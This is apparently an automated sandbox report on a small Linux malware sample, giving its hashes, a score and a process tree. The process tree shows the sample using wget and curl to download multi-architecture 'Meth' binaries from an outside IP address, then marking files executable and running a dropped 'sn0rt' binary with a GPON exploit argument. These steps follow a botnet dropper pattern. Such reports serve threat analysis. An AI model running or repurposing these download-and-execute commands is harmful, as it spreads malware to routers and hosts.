Analysis

  • max time kernel
    79s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    28-07-2024 03:58

General

  • Target

    084300db84b72d190951f7cca78ee9e3_JaffaCakes118

  • Size

    3KB

  • MD5

    084300db84b72d190951f7cca78ee9e3

  • SHA1

    a3a989180ea0ffa677ed97f1a3747c771caee062

  • SHA256

    d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f

  • SHA512

    ad0f90a8eb754101ce13fc19d18dc3d801aa297138aeb83b3e0e4ead97ec7c7d35b46e8834d2553385cad5bef0e8f281b5a6fdca8ce1a7a7bb4dac52eabcdef8

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 13 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
    /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:1524
    • /usr/bin/wget
      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86
      2⤵
        PID:1525
      • /usr/bin/curl
        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86
        2⤵
          PID:1529
        • /bin/cat
          cat Meth.x86
          2⤵
            PID:1530
          • /bin/chmod
            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W
            2⤵
              PID:1531
            • /tmp/sn0rt
              ./sn0rt gpon443.exploit
              2⤵
              • Executes dropped EXE
              PID:1532
            • /usr/bin/wget
              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips
              2⤵
                PID:1534
              • /usr/bin/curl
                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips
                2⤵
                  PID:1535
                • /bin/cat
                  cat Meth.mips
                  2⤵
                    PID:1536
                  • /bin/chmod
                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W
                    2⤵
                      PID:1537
                    • /tmp/sn0rt
                      ./sn0rt gpon443.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:1538
                    • /usr/bin/wget
                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl
                      2⤵
                        PID:1540
                      • /usr/bin/curl
                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl
                        2⤵
                          PID:1541
                        • /bin/cat
                          cat Meth.mpsl
                          2⤵
                            PID:1542
                          • /bin/chmod
                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W
                            2⤵
                              PID:1543
                            • /tmp/sn0rt
                              ./sn0rt gpon443.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:1544
                            • /usr/bin/wget
                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm
                              2⤵
                                PID:1546
                              • /usr/bin/curl
                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm
                                2⤵
                                  PID:1547
                                • /bin/cat
                                  cat Meth.arm
                                  2⤵
                                    PID:1548
                                  • /bin/chmod
                                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W
                                    2⤵
                                      PID:1549
                                    • /tmp/sn0rt
                                      ./sn0rt gpon443.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1550
                                    • /usr/bin/wget
                                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5
                                      2⤵
                                        PID:1552
                                      • /usr/bin/curl
                                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5
                                        2⤵
                                          PID:1553
                                        • /bin/cat
                                          cat Meth.arm5
                                          2⤵
                                            PID:1556
                                          • /bin/chmod
                                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                            2⤵
                                              PID:1557
                                            • /tmp/sn0rt
                                              ./sn0rt gpon443.exploit
                                              2⤵
                                              • Executes dropped EXE
                                              PID:1558
                                            • /usr/bin/wget
                                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6
                                              2⤵
                                                PID:1560
                                              • /usr/bin/curl
                                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6
                                                2⤵
                                                  PID:1561
                                                • /bin/cat
                                                  cat Meth.arm6
                                                  2⤵
                                                    PID:1562
                                                  • /bin/chmod
                                                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                    2⤵
                                                      PID:1563
                                                    • /tmp/sn0rt
                                                      ./sn0rt gpon443.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:1564
                                                    • /usr/bin/wget
                                                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7
                                                      2⤵
                                                        PID:1566
                                                      • /usr/bin/curl
                                                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7
                                                        2⤵
                                                          PID:1567
                                                        • /bin/cat
                                                          cat Meth.arm7
                                                          2⤵
                                                            PID:1568
                                                          • /bin/chmod
                                                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                            2⤵
                                                              PID:1569
                                                            • /tmp/sn0rt
                                                              ./sn0rt gpon443.exploit
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:1570
                                                            • /usr/bin/wget
                                                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc
                                                              2⤵
                                                                PID:1572
                                                              • /usr/bin/curl
                                                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc
                                                                2⤵
                                                                  PID:1573
                                                                • /bin/cat
                                                                  cat Meth.ppc
                                                                  2⤵
                                                                    PID:1574
                                                                  • /bin/chmod
                                                                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                                    2⤵
                                                                      PID:1575
                                                                    • /tmp/sn0rt
                                                                      ./sn0rt gpon443.exploit
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:1576
                                                                    • /usr/bin/wget
                                                                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k
                                                                      2⤵
                                                                        PID:1578
                                                                      • /usr/bin/curl
                                                                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k
                                                                        2⤵
                                                                          PID:1579
                                                                        • /bin/cat
                                                                          cat Meth.m68k
                                                                          2⤵
                                                                            PID:1580
                                                                          • /bin/chmod
                                                                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                                            2⤵
                                                                              PID:1581
                                                                            • /tmp/sn0rt
                                                                              ./sn0rt gpon443.exploit
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:1582
                                                                            • /usr/bin/wget
                                                                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc
                                                                              2⤵
                                                                                PID:1584
                                                                              • /usr/bin/curl
                                                                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc
                                                                                2⤵
                                                                                  PID:1585
                                                                                • /bin/cat
                                                                                  cat Meth.spc
                                                                                  2⤵
                                                                                    PID:1586
                                                                                  • /bin/chmod
                                                                                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                                                    2⤵
                                                                                      PID:1587
                                                                                    • /tmp/sn0rt
                                                                                      ./sn0rt gpon443.exploit
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1588
                                                                                    • /usr/bin/wget
                                                                                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686
                                                                                      2⤵
                                                                                        PID:1590
                                                                                      • /usr/bin/curl
                                                                                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686
                                                                                        2⤵
                                                                                          PID:1591
                                                                                        • /bin/cat
                                                                                          cat Meth.i686
                                                                                          2⤵
                                                                                            PID:1592
                                                                                          • /bin/chmod
                                                                                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                                                            2⤵
                                                                                              PID:1593
                                                                                            • /tmp/sn0rt
                                                                                              ./sn0rt gpon443.exploit
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1594
                                                                                            • /usr/bin/wget
                                                                                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4
                                                                                              2⤵
                                                                                                PID:1596
                                                                                              • /usr/bin/curl
                                                                                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4
                                                                                                2⤵
                                                                                                  PID:1597
                                                                                                • /bin/cat
                                                                                                  cat Meth.sh4
                                                                                                  2⤵
                                                                                                    PID:1598
                                                                                                  • /bin/chmod
                                                                                                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                                                                    2⤵
                                                                                                      PID:1599
                                                                                                    • /tmp/sn0rt
                                                                                                      ./sn0rt gpon443.exploit
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1600
                                                                                                    • /usr/bin/wget
                                                                                                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc
                                                                                                      2⤵
                                                                                                        PID:1602
                                                                                                      • /usr/bin/curl
                                                                                                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc
                                                                                                        2⤵
                                                                                                          PID:1603
                                                                                                        • /bin/cat
                                                                                                          cat Meth.arc
                                                                                                          2⤵
                                                                                                            PID:1604
                                                                                                          • /bin/chmod
                                                                                                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
                                                                                                            2⤵
                                                                                                              PID:1605
                                                                                                            • /tmp/sn0rt
                                                                                                              ./sn0rt gpon443.exploit
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1606

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads